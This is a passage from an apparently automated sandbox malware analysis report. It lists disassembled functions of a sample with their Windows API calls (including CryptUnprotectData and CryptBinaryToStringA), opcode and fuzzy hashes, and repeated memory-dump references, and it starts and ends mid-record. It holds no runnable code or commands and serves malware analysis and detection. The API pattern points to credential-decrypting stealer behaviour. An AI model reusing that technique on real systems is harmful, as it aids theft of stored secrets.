                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &j?$+w$hD.=$}o
                                    • API String ID: 0-3985561175
                                    • Opcode ID: e74c01117dce0f193ad8546d82a245d2ced773095e04998c779c0d68fa72d7e5
                                    • Instruction ID: 76f67579c7c5c762976cc1f446a0e6ab50cdfff61e8ddf4aff092792d257dd38
                                    • Opcode Fuzzy Hash: e74c01117dce0f193ad8546d82a245d2ced773095e04998c779c0d68fa72d7e5
                                    • Instruction Fuzzy Hash: A3B2D8F360C200AFE3046E2DEC8567ABBE9EF94720F16493DEAC4D7744E63558058697
                                    Function 000E8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,000D5184,40000001,00000000,00000000,?,000D5184), ref: 000E8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: d483d9dfc9eefb909eaef438c44f8d43c7dc4395524cd14caa74787ad8de83f4
                                    • Instruction ID: fdf70fd110b58ba93dbc9306ae091da03468835d96f80a6f7c6ed16407a9aca6
                                    • Opcode Fuzzy Hash: d483d9dfc9eefb909eaef438c44f8d43c7dc4395524cd14caa74787ad8de83f4
                                    • Instruction Fuzzy Hash: FE111570200248BFDB50CF65E884FAB37A9AF89301F10D558F9199B261DB35EC41DB60
                                    Function 000E7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00B7F208,00000000,?,000F0E10,00000000,?,00000000,00000000), ref: 000E7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00B7F208,00000000,?,000F0E10,00000000,?,00000000,00000000,?), ref: 000E7A7D
                                    • wsprintfA.USER32 ref: 000E7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 89a19c3b460ce8c20773fb748d4fab584e80fd6fc6438b6949c6bc4639652fd9
                                    • Instruction ID: ecd30e6f169a71decdcbe729bdca6cb1b7f526d059b27866eeafe691ccf30ae2
                                    • Opcode Fuzzy Hash: 89a19c3b460ce8c20773fb748d4fab584e80fd6fc6438b6949c6bc4639652fd9
                                    • Instruction Fuzzy Hash: 961170B1946618DFDB208B55DC45FA9BBB8F744721F1043A6E60AA3280D7741A40CB52
                                    Function 004ACB69 Relevance: 5.4, Strings: 3, Instructions: 1611COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /rq=$cQc{$x+O
                                    • API String ID: 0-1627834019
                                    • Opcode ID: 3422d5627424fa53747f63c41b821b96f680e4669cda163d976af818173520d4
                                    • Instruction ID: 07237514e6465390937b255cdb90930ed3db4ed11f1dd4d7c3c160425ce6bd38
                                    • Opcode Fuzzy Hash: 3422d5627424fa53747f63c41b821b96f680e4669cda163d976af818173520d4
                                    • Instruction Fuzzy Hash: 2EB227F390C2049FE3046E2DEC8567ABBE9EB94720F1A493DEAC5D7740EA3558018797
                                    Function 000E3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(000EE118,00000000,00000001,000EE108,00000000), ref: 000E3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000E37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 4eb80bd380e06baed71b9079723681e24fa87dcf1f2750bcda0913876d0911c2
                                    • Instruction ID: 1d5c5ebafabf91d87d1bfa1fc5447ca51cea24bf04059fb28b8134e77599c3a2
                                    • Opcode Fuzzy Hash: 4eb80bd380e06baed71b9079723681e24fa87dcf1f2750bcda0913876d0911c2
                                    • Instruction Fuzzy Hash: 0841C770A40A289FDB24DB58CC99BDBB7B5BB48702F4091D8E609AB2D0D7716EC5CF50
                                    Function 000D9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000D9BA3
                                    • LocalFree.KERNEL32(?), ref: 000D9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 334677464a12483293dabf596d260c66b3e1a5072cdb909e63fccb5b3da142f9
                                    • Instruction ID: f155187e66e002e555a49be273a02d6eb1271ca3d6528b675345f5d314a65636
                                    • Opcode Fuzzy Hash: 334677464a12483293dabf596d260c66b3e1a5072cdb909e63fccb5b3da142f9
                                    • Instruction Fuzzy Hash: 5D11E8B4A01209DFCB05DFA8D985AAE77B9FB88300F108559E81597390D770AE10CB61
                                    Function 003EC2CB Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +(on$ta$l"Q
                                    • API String ID: 0-3849359154
                                    • Opcode ID: 0205d8d6bf4500f7651279ff2d02694354401a4a727fc1fc01a83f9e73778903
                                    • Instruction ID: 76900a37c9aa4d45f84dec2d09e9966724c356814c3d8501c5cc5e158a11f5df
                                    • Opcode Fuzzy Hash: 0205d8d6bf4500f7651279ff2d02694354401a4a727fc1fc01a83f9e73778903
                                    • Instruction Fuzzy Hash: FD414AF3B082109FE3006E2EECC576BB7E6EBD4324F1B463DE68497784D57958058682
                                    Function 004A165F Relevance: 3.6, Strings: 2, Instructions: 1119COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @S[$F~Z
                                    • API String ID: 0-1815195872
                                    • Opcode ID: a1bddbb795feb2923a8bcfb9cc077c80dbfc0219a2a9d542b2812641e43e9a11
                                    • Instruction ID: fac7081844ed788f75fbe739deba886afa34550cc372458cd7f21f03456ef66f
                                    • Opcode Fuzzy Hash: a1bddbb795feb2923a8bcfb9cc077c80dbfc0219a2a9d542b2812641e43e9a11
                                    • Instruction Fuzzy Hash: 0072F6F3A0C2009FE308AE2DDC8567AF7E9EF94720F16492DEAC4C7744EA7558418796
                                    Function 004A4BC2 Relevance: 2.4, Strings: 1, Instructions: 1125COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,:?
                                    • API String ID: 0-2368655682
                                    • Opcode ID: 09285659e71c08bfe920bbf170c11abe66f2c015bcdd5f901235e4451636a781
                                    • Instruction ID: ad3228b683b16a945a117376b0620a2a32cfe7bfef2c57689b36066c7ef91d1d
                                    • Opcode Fuzzy Hash: 09285659e71c08bfe920bbf170c11abe66f2c015bcdd5f901235e4451636a781
                                    • Instruction Fuzzy Hash: D77209F360C2009FE704AE2DEC8567AB7E5EF94720F1A893DE6C5C3744EA3598058697
                                    Function 004A3804 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: U0<
                                    • API String ID: 0-2969675609
                                    • Opcode ID: 389dbd56429dd74c1c98278b2a95eba4e135387c6bacfc7a4510e1eeb346855a
                                    • Instruction ID: f71e784f8bf7da31b5558bf12b2b4408517b213fc929ac87ad0a17976871f59f
                                    • Opcode Fuzzy Hash: 389dbd56429dd74c1c98278b2a95eba4e135387c6bacfc7a4510e1eeb346855a
                                    • Instruction Fuzzy Hash: DC02D7B3608304AFE3046E6DEC8567AFBE9EF94720F1A463DE6C4C3740E63599118697
                                    Function 005A35BE Relevance: .2, Instructions: 188COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b432d4d84945871a7b9b1b144554191912a7a09734e5ff9cf33989d6bb75e4ff
                                    • Instruction ID: 478a7aef858b5ee6541a43352ee185de2df568575b696fd77fc0c6fcf28df473
                                    • Opcode Fuzzy Hash: b432d4d84945871a7b9b1b144554191912a7a09734e5ff9cf33989d6bb75e4ff
                                    • Instruction Fuzzy Hash: EE51A2B2A0C601EFE304AE19DC8167EBBE5FB99358F358C2DB5C687310E6345A119793
                                    Function 0045608E Relevance: .2, Instructions: 185COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ccea779eb305fd594fa3bee4ce92749dfeb65dfc4d66d853c78d8779cb802e5
                                    • Instruction ID: 974ce99852d58079cd17259ae22cda2163451e218c13ac1e92e276cb332f8955
                                    • Opcode Fuzzy Hash: 4ccea779eb305fd594fa3bee4ce92749dfeb65dfc4d66d853c78d8779cb802e5
                                    • Instruction Fuzzy Hash: 395105F3E082105BE318AA28DC8577AB6D5EB94310F1B863CEFD997384E9795C0486C6
                                    Function 0036A48B Relevance: .2, Instructions: 168COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
